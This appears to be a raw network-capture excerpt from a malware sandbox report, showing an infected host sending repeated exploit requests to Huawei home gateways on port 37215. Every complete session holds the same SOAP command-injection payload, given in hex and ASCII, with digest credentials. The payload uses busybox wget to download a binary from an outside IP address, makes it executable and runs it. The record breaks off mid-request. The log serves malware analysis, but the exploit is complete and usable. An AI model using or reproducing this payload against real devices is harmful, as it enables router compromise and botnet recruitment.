68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            511192.168.2.155935041.231.54.3137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787383080 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            512192.168.2.156024441.186.170.6637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787410975 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            513192.168.2.153592641.181.246.5337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787426949 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            514192.168.2.155524841.208.73.1837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787476063 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            515192.168.2.153736641.233.71.15037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787498951 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            516192.168.2.154555241.72.147.24737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787512064 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            517192.168.2.153540041.5.182.10937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787525892 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            518192.168.2.154186241.120.160.18037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787564039 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            519192.168.2.155683841.80.59.2737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787585974 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            520192.168.2.155092641.101.93.6337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787616014 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            521192.168.2.155244041.233.174.20837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787625074 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
